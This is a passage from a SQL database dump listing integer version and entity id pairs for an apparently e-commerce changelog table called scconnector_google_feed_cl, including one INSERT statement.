(24738, 1288),
(24739, 1288),
(24740, 1288),
(24741, 1288),
(24742, 1288),
(24743, 1288),
(24744, 1289),
(24745, 1289),
(24746, 1289),
(24747, 1289),
(24748, 1289),
(24749, 1289),
(24750, 1289),
(24751, 1290),
(24752, 1290),
(24753, 1290),
(24754, 1290),
(24755, 1290),
(24756, 1290),
(24757, 1290),
(24758, 1291),
(24759, 1291),
(24760, 1291),
(24761, 1291),
(24762, 1291),
(24763, 1291),
(24764, 1291),
(24765, 1292),
(24766, 1292),
(24767, 1292),
(24768, 1292),
(24769, 1292),
(24770, 1292),
(24771, 1292),
(24772, 1293),
(24773, 1293),
(24774, 1293),
(24775, 1293),
(24776, 1293),
(24777, 1293),
(24778, 1293),
(24779, 1294),
(24780, 1294),
(24781, 1294),
(24782, 1294),
(24783, 1294),
(24784, 1294),
(24785, 1294),
(24786, 1295),
(24787, 1295),
(24788, 1295),
(24789, 1295),
(24790, 1295),
(24791, 1295),
(24792, 1295),
(24793, 1296),
(24794, 1296),
(24795, 1296),
(24796, 1296),
(24797, 1296),
(24798, 1296),
(24799, 1296),
(24800, 1297),
(24801, 1297),
(24802, 1297),
(24803, 1297),
(24804, 1297),
(24805, 1297),
(24806, 1297),
(24807, 1297),
(24808, 1297),
(24809, 1297),
(24810, 1297),
(24811, 1298),
(24812, 1298),
(24813, 1298),
(24814, 1298),
(24815, 1298),
(24816, 1298),
(24817, 1298),
(24818, 1299),
(24819, 1299),
(24820, 1299),
(24821, 1299),
(24822, 1299),
(24823, 1299),
(24824, 1299),
(24825, 1300),
(24826, 1300),
(24827, 1300),
(24828, 1300),
(24829, 1300),
(24830, 1300),
(24831, 1300),
(24832, 1301),
(24833, 1301),
(24834, 1301),
(24835, 1301),
(24836, 1301),
(24837, 1301),
(24838, 1301),
(24839, 1302),
(24840, 1302),
(24841, 1302),
(24842, 1302),
(24843, 1302),
(24844, 1302),
(24845, 1302),
(24846, 1303),
(24847, 1303),
(24848, 1303),
(24849, 1303),
(24850, 1303),
(24851, 1303),
(24852, 1303),
(24853, 1304),
(24854, 1304),
(24855, 1304),
(24856, 1304),
(24857, 1304),
(24858, 1304),
(24859, 1304),
(24860, 1305),
(24861, 1305),
(24862, 1305),
(24863, 1305),
(24864, 1305),
(24865, 1305),
(24866, 1305),
(24867, 1306),
(24868, 1306),
(24869, 1306),
(24870, 1306),
(24871, 1306),
(24872, 1306),
(24873, 1306),
(24874, 1307),
(24875, 1307),
(24876, 1307),
(24877, 1307),
(24878, 1307),
(24879, 1307),
(24880, 1307),
(24881, 1308),
(24882, 1308),
(24883, 1308),
(24884, 1308),
(24885, 1308),
(24886, 1308),
(24887, 1308),
(24888, 1309),
(24889, 1309),
(24890, 1309),
(24891, 1309),
(24892, 1309),
(24893, 1309),
(24894, 1309),
(24895, 1310),
(24896, 1310),
(24897, 1310),
(24898, 1310),
(24899, 1310),
(24900, 1310),
(24901, 1310),
(24902, 1311),
(24903, 1311),
(24904, 1311),
(24905, 1311),
(24906, 1311),
(24907, 1311),
(24908, 1311),
(24909, 1312),
(24910, 1312),
(24911, 1312),
(24912, 1312),
(24913, 1312),
(24914, 1312),
(24915, 1312),
(24916, 1313),
(24917, 1313),
(24918, 1313),
(24919, 1313),
(24920, 1313),
(24921, 1313),
(24922, 1313),
(24923, 1313),
(24924, 1313),
(24925, 1313),
(24926, 1313),
(24927, 1314),
(24928, 1314),
(24929, 1314),
(24930, 1314),
(24931, 1314),
(24932, 1314),
(24933, 1314),
(24934, 1315),
(24935, 1315),
(24936, 1315),
(24937, 1315),
(24938, 1315),
(24939, 1315),
(24940, 1315),
(24941, 1316),
(24942, 1316),
(24943, 1316),
(24944, 1316),
(24945, 1316),
(24946, 1316),
(24947, 1316),
(24948, 1317),
(24949, 1317),
(24950, 1317),
(24951, 1317),
(24952, 1317),
(24953, 1317),
(24954, 1317),
(24955, 1318),
(24956, 1318),
(24957, 1318),
(24958, 1318),
(24959, 1318),
(24960, 1318),
(24961, 1318),
(24962, 1319),
(24963, 1319),
(24964, 1319),
(24965, 1319),
(24966, 1319),
(24967, 1319),
(24968, 1319),
(24969, 1320),
(24970, 1320),
(24971, 1320),
(24972, 1320),
(24973, 1320),
(24974, 1320),
(24975, 1320),
(24976, 1321),
(24977, 1321),
(24978, 1321),
(24979, 1321),
(24980, 1321),
(24981, 1321),
(24982, 1321),
(24983, 1322),
(24984, 1322),
(24985, 1322),
(24986, 1322),
(24987, 1322),
(24988, 1322),
(24989, 1322),
(24990, 1323),
(24991, 1323),
(24992, 1323),
(24993, 1323),
(24994, 1323),
(24995, 1323),
(24996, 1323),
(24997, 1324),
(24998, 1324),
(24999, 1324),
(25000, 1324),
(25001, 1324),
(25002, 1324),
(25003, 1324),
(25004, 1325),
(25005, 1325),
(25006, 1325),
(25007, 1325),
(25008, 1325),
(25009, 1325),
(25010, 1325),
(25011, 1326),
(25012, 1326),
(25013, 1326),
(25014, 1326),
(25015, 1326),
(25016, 1326),
(25017, 1326),
(25018, 1327),
(25019, 1327),
(25020, 1327),
(25021, 1327),
(25022, 1327),
(25023, 1327),
(25024, 1327),
(25025, 1328),
(25026, 1328),
(25027, 1328),
(25028, 1328),
(25029, 1328),
(25030, 1328),
(25031, 1328),
(25032, 1329),
(25033, 1329),
(25034, 1329),
(25035, 1329),
(25036, 1329),
(25037, 1329),
(25038, 1329),
(25039, 1329),
(25040, 1329),
(25041, 1329),
(25042, 1329),
(25043, 1330),
(25044, 1330),
(25045, 1330),
(25046, 1330),
(25047, 1330),
(25048, 1330),
(25049, 1330),
(25050, 1331),
(25051, 1331),
(25052, 1331),
(25053, 1331),
(25054, 1331),
(25055, 1331),
(25056, 1331),
(25057, 1332),
(25058, 1332),
(25059, 1332),
(25060, 1332),
(25061, 1332),
(25062, 1332),
(25063, 1332),
(25064, 1333),
(25065, 1333),
(25066, 1333),
(25067, 1333),
(25068, 1333),
(25069, 1333),
(25070, 1333),
(25071, 1334),
(25072, 1334),
(25073, 1334),
(25074, 1334),
(25075, 1334),
(25076, 1334),
(25077, 1334),
(25078, 1335),
(25079, 1335),
(25080, 1335),
(25081, 1335),
(25082, 1335),
(25083, 1335),
(25084, 1335),
(25085, 1336),
(25086, 1336),
(25087, 1336),
(25088, 1336),
(25089, 1336),
(25090, 1336),
(25091, 1336),
(25092, 1337),
(25093, 1337),
(25094, 1337),
(25095, 1337),
(25096, 1337),
(25097, 1337),
(25098, 1337),
(25099, 1338),
(25100, 1338),
(25101, 1338),
(25102, 1338),
(25103, 1338),
(25104, 1338),
(25105, 1338),
(25106, 1339),
(25107, 1339),
(25108, 1339),
(25109, 1339),
(25110, 1339),
(25111, 1339),
(25112, 1339),
(25113, 1340),
(25114, 1340),
(25115, 1340),
(25116, 1340),
(25117, 1340),
(25118, 1340),
(25119, 1340),
(25120, 1341),
(25121, 1341),
(25122, 1341),
(25123, 1341),
(25124, 1341),
(25125, 1341),
(25126, 1341),
(25127, 1342),
(25128, 1342),
(25129, 1342),
(25130, 1342),
(25131, 1342),
(25132, 1342),
(25133, 1342),
(25134, 1343),
(25135, 1343),
(25136, 1343),
(25137, 1343),
(25138, 1343),
(25139, 1343),
(25140, 1343),
(25141, 1344),
(25142, 1344),
(25143, 1344),
(25144, 1344),
(25145, 1344),
(25146, 1344),
(25147, 1344),
(25148, 1345),
(25149, 1345),
(25150, 1345),
(25151, 1345),
(25152, 1345),
(25153, 1345),
(25154, 1345),
(25155, 1345),
(25156, 1345),
(25157, 1345),
(25158, 1345),
(25159, 1346),
(25160, 1346),
(25161, 1346),
(25162, 1346),
(25163, 1346),
(25164, 1346),
(25165, 1346),
(25166, 1347),
(25167, 1347),
(25168, 1347),
(25169, 1347),
(25170, 1347),
(25171, 1347),
(25172, 1347),
(25173, 1348),
(25174, 1348),
(25175, 1348),
(25176, 1348),
(25177, 1348),
(25178, 1348),
(25179, 1348),
(25180, 1349),
(25181, 1349),
(25182, 1349),
(25183, 1349),
(25184, 1349),
(25185, 1349),
(25186, 1349),
(25187, 1350),
(25188, 1350),
(25189, 1350),
(25190, 1350),
(25191, 1350),
(25192, 1350),
(25193, 1350),
(25194, 1351),
(25195, 1351),
(25196, 1351),
(25197, 1351),
(25198, 1351),
(25199, 1351),
(25200, 1351),
(25201, 1352),
(25202, 1352),
(25203, 1352),
(25204, 1352),
(25205, 1352),
(25206, 1352),
(25207, 1352),
(25208, 1353),
(25209, 1353),
(25210, 1353),
(25211, 1353),
(25212, 1353),
(25213, 1353),
(25214, 1353),
(25215, 1354),
(25216, 1354),
(25217, 1354),
(25218, 1354),
(25219, 1354),
(25220, 1354),
(25221, 1354),
(25222, 1355),
(25223, 1355),
(25224, 1355),
(25225, 1355),
(25226, 1355),
(25227, 1355),
(25228, 1355),
(25229, 1356),
(25230, 1356),
(25231, 1356),
(25232, 1356),
(25233, 1356),
(25234, 1356),
(25235, 1356),
(25236, 1357),
(25237, 1357),
(25238, 1357),
(25239, 1357),
(25240, 1357),
(25241, 1357),
(25242, 1357),
(25243, 1358),
(25244, 1358),
(25245, 1358),
(25246, 1358),
(25247, 1358),
(25248, 1358),
(25249, 1358),
(25250, 1359),
(25251, 1359),
(25252, 1359),
(25253, 1359),
(25254, 1359),
(25255, 1359),
(25256, 1359),
(25257, 1260),
(25258, 1261),
(25259, 1262),
(25260, 1263),
(25261, 1264),
(25262, 1265),
(25263, 1266),
(25264, 1267),
(25265, 1268),
(25266, 1269),
(25267, 1270),
(25268, 1271),
(25269, 1272),
(25270, 1273),
(25271, 1274),
(25272, 1275),
(25273, 1276),
(25274, 1277),
(25275, 1278),
(25276, 1279),
(25277, 1280),
(25278, 1281),
(25279, 1282),
(25280, 1283),
(25281, 1284),
(25282, 1285),
(25283, 1286),
(25284, 1287),
(25285, 1288),
(25286, 1289),
(25287, 1290),
(25288, 1291),
(25289, 1292),
(25290, 1293),
(25291, 1294),
(25292, 1295),
(25293, 1296),
(25294, 1297),
(25295, 1298),
(25296, 1299),
(25297, 1300),
(25298, 1301),
(25299, 1302),
(25300, 1303),
(25301, 1304),
(25302, 1305),
(25303, 1306),
(25304, 1307),
(25305, 1308),
(25306, 1309),
(25307, 1310),
(25308, 1311),
(25309, 1312),
(25310, 1313),
(25311, 1314),
(25312, 1315),
(25313, 1316),
(25314, 1317),
(25315, 1318),
(25316, 1319),
(25317, 1320),
(25318, 1321),
(25319, 1322),
(25320, 1323),
(25321, 1324),
(25322, 1325),
(25323, 1326),
(25324, 1327),
(25325, 1328),
(25326, 1329),
(25327, 1330),
(25328, 1331),
(25329, 1332),
(25330, 1333),
(25331, 1334),
(25332, 1335),
(25333, 1336),
(25334, 1337),
(25335, 1338),
(25336, 1339),
(25337, 1340),
(25338, 1341),
(25339, 1342),
(25340, 1343),
(25341, 1344),
(25342, 1345),
(25343, 1346),
(25344, 1347),
(25345, 1348),
(25346, 1349),
(25347, 1350),
(25348, 1351),
(25349, 1352),
(25350, 1353),
(25351, 1354),
(25352, 1355),
(25353, 1356),
(25354, 1357),
(25355, 1358),
(25356, 1359),
(25357, 1260),
(25358, 1260),
(25359, 1260),
(25360, 1260),
(25361, 1260),
(25362, 1260),
(25363, 1261),
(25364, 1261),
(25365, 1261),
(25366, 1261),
(25367, 1261),
(25368, 1261),
(25369, 1262),
(25370, 1262),
(25371, 1262),
(25372, 1262),
(25373, 1262),
(25374, 1262),
(25375, 1263),
(25376, 1263),
(25377, 1263),
(25378, 1263),
(25379, 1263),
(25380, 1263),
(25381, 1264),
(25382, 1264),
(25383, 1264),
(25384, 1264),
(25385, 1264),
(25386, 1264),
(25387, 1265),
(25388, 1265),
(25389, 1265),
(25390, 1265),
(25391, 1265),
(25392, 1265),
(25393, 1265),
(25394, 1265),
(25395, 1265),
(25396, 1266),
(25397, 1266),
(25398, 1266),
(25399, 1266),
(25400, 1266),
(25401, 1266),
(25402, 1267),
(25403, 1267),
(25404, 1267),
(25405, 1267),
(25406, 1267),
(25407, 1267),
(25408, 1268),
(25409, 1268),
(25410, 1268),
(25411, 1268),
(25412, 1268),
(25413, 1268),
(25414, 1269),
(25415, 1269),
(25416, 1269),
(25417, 1269),
(25418, 1269),
(25419, 1269),
(25420, 1270),
(25421, 1270),
(25422, 1270),
(25423, 1270),
(25424, 1270),
(25425, 1270),
(25426, 1271),
(25427, 1271),
(25428, 1271),
(25429, 1271),
(25430, 1271),
(25431, 1271),
(25432, 1272),
(25433, 1272),
(25434, 1272),
(25435, 1272),
(25436, 1272),
(25437, 1272),
(25438, 1273),
(25439, 1273),
(25440, 1273),
(25441, 1273),
(25442, 1273),
(25443, 1273),
(25444, 1274),
(25445, 1274),
(25446, 1274),
(25447, 1274),
(25448, 1274),
(25449, 1274),
(25450, 1275),
(25451, 1275),
(25452, 1275),
(25453, 1275),
(25454, 1275),
(25455, 1275),
(25456, 1276),
(25457, 1276),
(25458, 1276),
(25459, 1276),
(25460, 1276),
(25461, 1276),
(25462, 1277),
(25463, 1277),
(25464, 1277),
(25465, 1277),
(25466, 1277),
(25467, 1277),
(25468, 1278),
(25469, 1278),
(25470, 1278),
(25471, 1278),
(25472, 1278),
(25473, 1278),
(25474, 1279),
(25475, 1279),
(25476, 1279),
(25477, 1279),
(25478, 1279),
(25479, 1279),
(25480, 1280),
(25481, 1280),
(25482, 1280),
(25483, 1280),
(25484, 1280),
(25485, 1280),
(25486, 1281),
(25487, 1281),
(25488, 1281),
(25489, 1281),
(25490, 1281),
(25491, 1281),
(25492, 1281),
(25493, 1281),
(25494, 1281),
(25495, 1282),
(25496, 1282),
(25497, 1282),
(25498, 1282),
(25499, 1282),
(25500, 1282),
(25501, 1283),
(25502, 1283),
(25503, 1283),
(25504, 1283),
(25505, 1283),
(25506, 1283),
(25507, 1284),
(25508, 1284),
(25509, 1284),
(25510, 1284),
(25511, 1284),
(25512, 1284),
(25513, 1285),
(25514, 1285),
(25515, 1285),
(25516, 1285),
(25517, 1285),
(25518, 1285),
(25519, 1286),
(25520, 1286),
(25521, 1286),
(25522, 1286),
(25523, 1286),
(25524, 1286),
(25525, 1287),
(25526, 1287),
(25527, 1287),
(25528, 1287),
(25529, 1287),
(25530, 1287),
(25531, 1288),
(25532, 1288),
(25533, 1288),
(25534, 1288),
(25535, 1288),
(25536, 1288),
(25537, 1289),
(25538, 1289),
(25539, 1289),
(25540, 1289),
(25541, 1289),
(25542, 1289),
(25543, 1290),
(25544, 1290),
(25545, 1290),
(25546, 1290),
(25547, 1290),
(25548, 1290),
(25549, 1291),
(25550, 1291),
(25551, 1291),
(25552, 1291),
(25553, 1291),
(25554, 1291),
(25555, 1292),
(25556, 1292),
(25557, 1292),
(25558, 1292),
(25559, 1292),
(25560, 1292),
(25561, 1293),
(25562, 1293),
(25563, 1293),
(25564, 1293),
(25565, 1293),
(25566, 1293),
(25567, 1294),
(25568, 1294),
(25569, 1294),
(25570, 1294),
(25571, 1294),
(25572, 1294),
(25573, 1295),
(25574, 1295),
(25575, 1295),
(25576, 1295),
(25577, 1295),
(25578, 1295),
(25579, 1296),
(25580, 1296),
(25581, 1296),
(25582, 1296),
(25583, 1296),
(25584, 1296),
(25585, 1297),
(25586, 1297),
(25587, 1297),
(25588, 1297),
(25589, 1297),
(25590, 1297),
(25591, 1297),
(25592, 1297),
(25593, 1297),
(25594, 1298),
(25595, 1298),
(25596, 1298),
(25597, 1298),
(25598, 1298),
(25599, 1298),
(25600, 1299),
(25601, 1299),
(25602, 1299),
(25603, 1299),
(25604, 1299),
(25605, 1299),
(25606, 1300),
(25607, 1300),
(25608, 1300),
(25609, 1300),
(25610, 1300),
(25611, 1300),
(25612, 1301),
(25613, 1301),
(25614, 1301),
(25615, 1301),
(25616, 1301),
(25617, 1301),
(25618, 1302);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(25619, 1302),
(25620, 1302),
(25621, 1302),
(25622, 1302),
(25623, 1302),
(25624, 1303),
(25625, 1303),
(25626, 1303),
(25627, 1303),
(25628, 1303),
(25629, 1303),
(25630, 1304),
(25631, 1304),
(25632, 1304),
(25633, 1304),
(25634, 1304),
(25635, 1304),
(25636, 1305),
(25637, 1305),
(25638, 1305),
(25639, 1305),
(25640, 1305),
(25641, 1305),
(25642, 1306),
(25643, 1306),
(25644, 1306),
(25645, 1306),
(25646, 1306),
(25647, 1306),
(25648, 1307),
(25649, 1307),
(25650, 1307),
(25651, 1307),
(25652, 1307),
(25653, 1307),
(25654, 1308),
(25655, 1308),
(25656, 1308),
(25657, 1308),
(25658, 1308),
(25659, 1308),
(25660, 1309),
(25661, 1309),
(25662, 1309),
(25663, 1309),
(25664, 1309),
(25665, 1309),
(25666, 1310),
(25667, 1310),
(25668, 1310),
(25669, 1310),
(25670, 1310),
(25671, 1310),
(25672, 1311),
(25673, 1311),
(25674, 1311),
(25675, 1311),
(25676, 1311),
(25677, 1311),
(25678, 1312),
(25679, 1312),
(25680, 1312),
(25681, 1312),
(25682, 1312),
(25683, 1312),
(25684, 1313),
(25685, 1313),
(25686, 1313),
(25687, 1313),
(25688, 1313),
(25689, 1313),
(25690, 1313),
(25691, 1313),
(25692, 1313),
(25693, 1314),
(25694, 1314),
(25695, 1314),
(25696, 1314),
(25697, 1314),
(25698, 1314),
(25699, 1315),
(25700, 1315),
(25701, 1315),
(25702, 1315),
(25703, 1315),
(25704, 1315),
(25705, 1316),
(25706, 1316),
(25707, 1316),
(25708, 1316),
(25709, 1316),
(25710, 1316),
(25711, 1317),
(25712, 1317),
(25713, 1317),
(25714, 1317),
(25715, 1317),
(25716, 1317),
(25717, 1318),
(25718, 1318),
(25719, 1318),
(25720, 1318),
(25721, 1318),
(25722, 1318),
(25723, 1319),
(25724, 1319),
(25725, 1319),
(25726, 1319),
(25727, 1319),
(25728, 1319),
(25729, 1320),
(25730, 1320),
(25731, 1320),
(25732, 1320),
(25733, 1320),
(25734, 1320),
(25735, 1321),
(25736, 1321),
(25737, 1321),
(25738, 1321),
(25739, 1321),
(25740, 1321),
(25741, 1322),
(25742, 1322),
(25743, 1322),
(25744, 1322),
(25745, 1322),
(25746, 1322),
(25747, 1323),
(25748, 1323),
(25749, 1323),
(25750, 1323),
(25751, 1323),
(25752, 1323),
(25753, 1324),
(25754, 1324),
(25755, 1324),
(25756, 1324),
(25757, 1324),
(25758, 1324),
(25759, 1325),
(25760, 1325),
(25761, 1325),
(25762, 1325),
(25763, 1325),
(25764, 1325),
(25765, 1326),
(25766, 1326),
(25767, 1326),
(25768, 1326),
(25769, 1326),
(25770, 1326),
(25771, 1327),
(25772, 1327),
(25773, 1327),
(25774, 1327),
(25775, 1327),
(25776, 1327),
(25777, 1328),
(25778, 1328),
(25779, 1328),
(25780, 1328),
(25781, 1328),
(25782, 1328),
(25783, 1329),
(25784, 1329),
(25785, 1329),
(25786, 1329),
(25787, 1329),
(25788, 1329),
(25789, 1329),
(25790, 1329),
(25791, 1329),
(25792, 1330),
(25793, 1330),
(25794, 1330),
(25795, 1330),
(25796, 1330),
(25797, 1330),
(25798, 1331),
(25799, 1331),
(25800, 1331),
(25801, 1331),
(25802, 1331),
(25803, 1331),
(25804, 1332),
(25805, 1332),
(25806, 1332),
(25807, 1332),
(25808, 1332),
(25809, 1332),
(25810, 1333),
(25811, 1333),
(25812, 1333),
(25813, 1333),
(25814, 1333),
(25815, 1333),
(25816, 1334),
(25817, 1334),
(25818, 1334),
(25819, 1334),
(25820, 1334),
(25821, 1334),
(25822, 1335),
(25823, 1335),
(25824, 1335),
(25825, 1335),
(25826, 1335),
(25827, 1335),
(25828, 1336),
(25829, 1336),
(25830, 1336),
(25831, 1336),
(25832, 1336),
(25833, 1336),
(25834, 1337),
(25835, 1337),
(25836, 1337),
(25837, 1337),
(25838, 1337),
(25839, 1337),
(25840, 1338),
(25841, 1338),
(25842, 1338),
(25843, 1338),
(25844, 1338),
(25845, 1338),
(25846, 1339),
(25847, 1339),
(25848, 1339),
(25849, 1339),
(25850, 1339),
(25851, 1339),
(25852, 1340),
(25853, 1340),
(25854, 1340),
(25855, 1340),
(25856, 1340),
(25857, 1340),
(25858, 1341),
(25859, 1341),
(25860, 1341),
(25861, 1341),
(25862, 1341),
(25863, 1341),
(25864, 1342),
(25865, 1342),
(25866, 1342),
(25867, 1342),
(25868, 1342),
(25869, 1342),
(25870, 1343),
(25871, 1343),
(25872, 1343),
(25873, 1343),
(25874, 1343),
(25875, 1343),
(25876, 1344),
(25877, 1344),
(25878, 1344),
(25879, 1344),
(25880, 1344),
(25881, 1344),
(25882, 1345),
(25883, 1345),
(25884, 1345),
(25885, 1345),
(25886, 1345),
(25887, 1345),
(25888, 1345),
(25889, 1345),
(25890, 1345),
(25891, 1346),
(25892, 1346),
(25893, 1346),
(25894, 1346),
(25895, 1346),
(25896, 1346),
(25897, 1347),
(25898, 1347),
(25899, 1347),
(25900, 1347),
(25901, 1347),
(25902, 1347),
(25903, 1348),
(25904, 1348),
(25905, 1348),
(25906, 1348),
(25907, 1348),
(25908, 1348),
(25909, 1349),
(25910, 1349),
(25911, 1349),
(25912, 1349),
(25913, 1349),
(25914, 1349),
(25915, 1350),
(25916, 1350),
(25917, 1350),
(25918, 1350),
(25919, 1350),
(25920, 1350),
(25921, 1351),
(25922, 1351),
(25923, 1351),
(25924, 1351),
(25925, 1351),
(25926, 1351),
(25927, 1352),
(25928, 1352),
(25929, 1352),
(25930, 1352),
(25931, 1352),
(25932, 1352),
(25933, 1353),
(25934, 1353),
(25935, 1353),
(25936, 1353),
(25937, 1353),
(25938, 1353),
(25939, 1354),
(25940, 1354),
(25941, 1354),
(25942, 1354),
(25943, 1354),
(25944, 1354),
(25945, 1355),
(25946, 1355),
(25947, 1355),
(25948, 1355),
(25949, 1355),
(25950, 1355),
(25951, 1356),
(25952, 1356),
(25953, 1356),
(25954, 1356),
(25955, 1356),
(25956, 1356),
(25957, 1357),
(25958, 1357),
(25959, 1357),
(25960, 1357),
(25961, 1357),
(25962, 1357),
(25963, 1358),
(25964, 1358),
(25965, 1358),
(25966, 1358),
(25967, 1358),
(25968, 1358),
(25969, 1359),
(25970, 1359),
(25971, 1359),
(25972, 1359),
(25973, 1359),
(25974, 1359),
(25975, 1260),
(25976, 1260),
(25977, 1261),
(25978, 1261),
(25979, 1262),
(25980, 1262),
(25981, 1263),
(25982, 1263),
(25983, 1264),
(25984, 1264),
(25985, 1265),
(25986, 1266),
(25987, 1266),
(25988, 1267),
(25989, 1267),
(25990, 1268),
(25991, 1268),
(25992, 1269),
(25993, 1269),
(25994, 1270),
(25995, 1270),
(25996, 1271),
(25997, 1271),
(25998, 1272),
(25999, 1272),
(26000, 1273),
(26001, 1273),
(26002, 1274),
(26003, 1274),
(26004, 1275),
(26005, 1275),
(26006, 1276),
(26007, 1276),
(26008, 1277),
(26009, 1277),
(26010, 1278),
(26011, 1278),
(26012, 1279),
(26013, 1279),
(26014, 1280),
(26015, 1280),
(26016, 1281),
(26017, 1282),
(26018, 1282),
(26019, 1283),
(26020, 1283),
(26021, 1284),
(26022, 1284),
(26023, 1285),
(26024, 1285),
(26025, 1286),
(26026, 1286),
(26027, 1287),
(26028, 1287),
(26029, 1288),
(26030, 1288),
(26031, 1289),
(26032, 1289),
(26033, 1290),
(26034, 1290),
(26035, 1291),
(26036, 1291),
(26037, 1292),
(26038, 1292),
(26039, 1293),
(26040, 1293),
(26041, 1294),
(26042, 1294),
(26043, 1295),
(26044, 1295),
(26045, 1296),
(26046, 1296),
(26047, 1297),
(26048, 1298),
(26049, 1298),
(26050, 1299),
(26051, 1299),
(26052, 1300),
(26053, 1300),
(26054, 1301),
(26055, 1301),
(26056, 1302),
(26057, 1302),
(26058, 1303),
(26059, 1303),
(26060, 1304),
(26061, 1304),
(26062, 1305),
(26063, 1305),
(26064, 1306),
(26065, 1306),
(26066, 1307),
(26067, 1307),
(26068, 1308),
(26069, 1308),
(26070, 1309),
(26071, 1309),
(26072, 1310),
(26073, 1310),
(26074, 1311),
(26075, 1311),
(26076, 1312),
(26077, 1312),
(26078, 1313),
(26079, 1314),
(26080, 1314),
(26081, 1315),
(26082, 1315),
(26083, 1316),
(26084, 1316),
(26085, 1317),
(26086, 1317),
(26087, 1318),
(26088, 1318),
(26089, 1319),
(26090, 1319),
(26091, 1320),
(26092, 1320),
(26093, 1321),
(26094, 1321),
(26095, 1322),
(26096, 1322),
(26097, 1323),
(26098, 1323),
(26099, 1324),
(26100, 1324),
(26101, 1325),
(26102, 1325),
(26103, 1326),
(26104, 1326),
(26105, 1327),
(26106, 1327),
(26107, 1328),
(26108, 1328),
(26109, 1329),
(26110, 1330),
(26111, 1330),
(26112, 1331),
(26113, 1331),
(26114, 1332),
(26115, 1332),
(26116, 1333),
(26117, 1333),
(26118, 1334),
(26119, 1334),
(26120, 1335),
(26121, 1335),
(26122, 1336),
(26123, 1336),
(26124, 1337),
(26125, 1337),
(26126, 1338),
(26127, 1338),
(26128, 1339),
(26129, 1339),
(26130, 1340),
(26131, 1340),
(26132, 1341),
(26133, 1341),
(26134, 1342),
(26135, 1342),
(26136, 1343),
(26137, 1343),
(26138, 1344),
(26139, 1344),
(26140, 1345),
(26141, 1346),
(26142, 1346),
(26143, 1347),
(26144, 1347),
(26145, 1348),
(26146, 1348),
(26147, 1349),
(26148, 1349),
(26149, 1350),
(26150, 1350),
(26151, 1351),
(26152, 1351),
(26153, 1352),
(26154, 1352),
(26155, 1353),
(26156, 1353),
(26157, 1354),
(26158, 1354),
(26159, 1355),
(26160, 1355),
(26161, 1356),
(26162, 1356),
(26163, 1357),
(26164, 1357),
(26165, 1358),
(26166, 1358),
(26167, 1359),
(26168, 1359),
(26169, 1360),
(26170, 1361),
(26171, 1362),
(26172, 1363),
(26173, 1364),
(26174, 1365),
(26175, 1366),
(26176, 1367),
(26177, 1368),
(26178, 1369),
(26179, 1370),
(26180, 1371),
(26181, 1372),
(26182, 1373),
(26183, 1374),
(26184, 1375),
(26185, 1376),
(26186, 1377),
(26187, 1378),
(26188, 1379),
(26189, 1380),
(26190, 1381),
(26191, 1382),
(26192, 1383),
(26193, 1384),
(26194, 1385),
(26195, 1386),
(26196, 1387),
(26197, 1388),
(26198, 1389),
(26199, 1390),
(26200, 1391),
(26201, 1392),
(26202, 1393),
(26203, 1394),
(26204, 1395),
(26205, 1396),
(26206, 1397),
(26207, 1398),
(26208, 1399),
(26209, 1400),
(26210, 1401),
(26211, 1402),
(26212, 1403),
(26213, 1404),
(26214, 1405),
(26215, 1406),
(26216, 1407),
(26217, 1408),
(26218, 1409),
(26219, 1410),
(26220, 1411),
(26221, 1412),
(26222, 1413),
(26223, 1414),
(26224, 1415),
(26225, 1416),
(26226, 1417),
(26227, 1418),
(26228, 1419),
(26229, 1420),
(26230, 1421),
(26231, 1422),
(26232, 1423),
(26233, 1424),
(26234, 1425),
(26235, 1426),
(26236, 1427),
(26237, 1428),
(26238, 1429),
(26239, 1430),
(26240, 1431),
(26241, 1432),
(26242, 1433),
(26243, 1434),
(26244, 1435),
(26245, 1436),
(26246, 1437),
(26247, 1438),
(26248, 1439),
(26249, 1440),
(26250, 1441),
(26251, 1442),
(26252, 1443),
(26253, 1444),
(26254, 1445),
(26255, 1446),
(26256, 1447),
(26257, 1448),
(26258, 1449),
(26259, 1450),
(26260, 1451),
(26261, 1452),
(26262, 1453),
(26263, 1454),
(26264, 1455),
(26265, 1456),
(26266, 1457),
(26267, 1458),
(26268, 1459),
(26269, 1360),
(26270, 1360),
(26271, 1360),
(26272, 1361),
(26273, 1361),
(26274, 1361),
(26275, 1362),
(26276, 1363),
(26277, 1363),
(26278, 1363),
(26279, 1364),
(26280, 1365),
(26281, 1366),
(26282, 1366),
(26283, 1366),
(26284, 1367),
(26285, 1368),
(26286, 1369),
(26287, 1369),
(26288, 1369),
(26289, 1370),
(26290, 1371),
(26291, 1372),
(26292, 1372),
(26293, 1372),
(26294, 1373),
(26295, 1374),
(26296, 1375),
(26297, 1375),
(26298, 1375),
(26299, 1376),
(26300, 1377),
(26301, 1377),
(26302, 1377),
(26303, 1378),
(26304, 1379),
(26305, 1380),
(26306, 1380),
(26307, 1380),
(26308, 1381),
(26309, 1382),
(26310, 1383),
(26311, 1383),
(26312, 1383),
(26313, 1384),
(26314, 1385),
(26315, 1386),
(26316, 1386),
(26317, 1386),
(26318, 1387),
(26319, 1388),
(26320, 1389),
(26321, 1389),
(26322, 1389),
(26323, 1390),
(26324, 1391),
(26325, 1392),
(26326, 1392),
(26327, 1392),
(26328, 1393),
(26329, 1393),
(26330, 1393),
(26331, 1394),
(26332, 1395),
(26333, 1395),
(26334, 1395),
(26335, 1396),
(26336, 1397),
(26337, 1398),
(26338, 1398),
(26339, 1398),
(26340, 1399),
(26341, 1400),
(26342, 1401),
(26343, 1401),
(26344, 1401),
(26345, 1402),
(26346, 1403),
(26347, 1404),
(26348, 1404),
(26349, 1404),
(26350, 1405),
(26351, 1406),
(26352, 1407),
(26353, 1407),
(26354, 1407),
(26355, 1408),
(26356, 1409),
(26357, 1409),
(26358, 1409),
(26359, 1410),
(26360, 1411),
(26361, 1411),
(26362, 1412),
(26363, 1413),
(26364, 1414),
(26365, 1414),
(26366, 1415),
(26367, 1416),
(26368, 1417),
(26369, 1417),
(26370, 1418),
(26371, 1419),
(26372, 1420),
(26373, 1420),
(26374, 1421),
(26375, 1422),
(26376, 1423),
(26377, 1423),
(26378, 1424),
(26379, 1425),
(26380, 1425),
(26381, 1426),
(26382, 1427),
(26383, 1428),
(26384, 1428),
(26385, 1428),
(26386, 1429),
(26387, 1430),
(26388, 1431),
(26389, 1431),
(26390, 1431),
(26391, 1432),
(26392, 1433),
(26393, 1434),
(26394, 1434),
(26395, 1434),
(26396, 1435),
(26397, 1436),
(26398, 1437),
(26399, 1437),
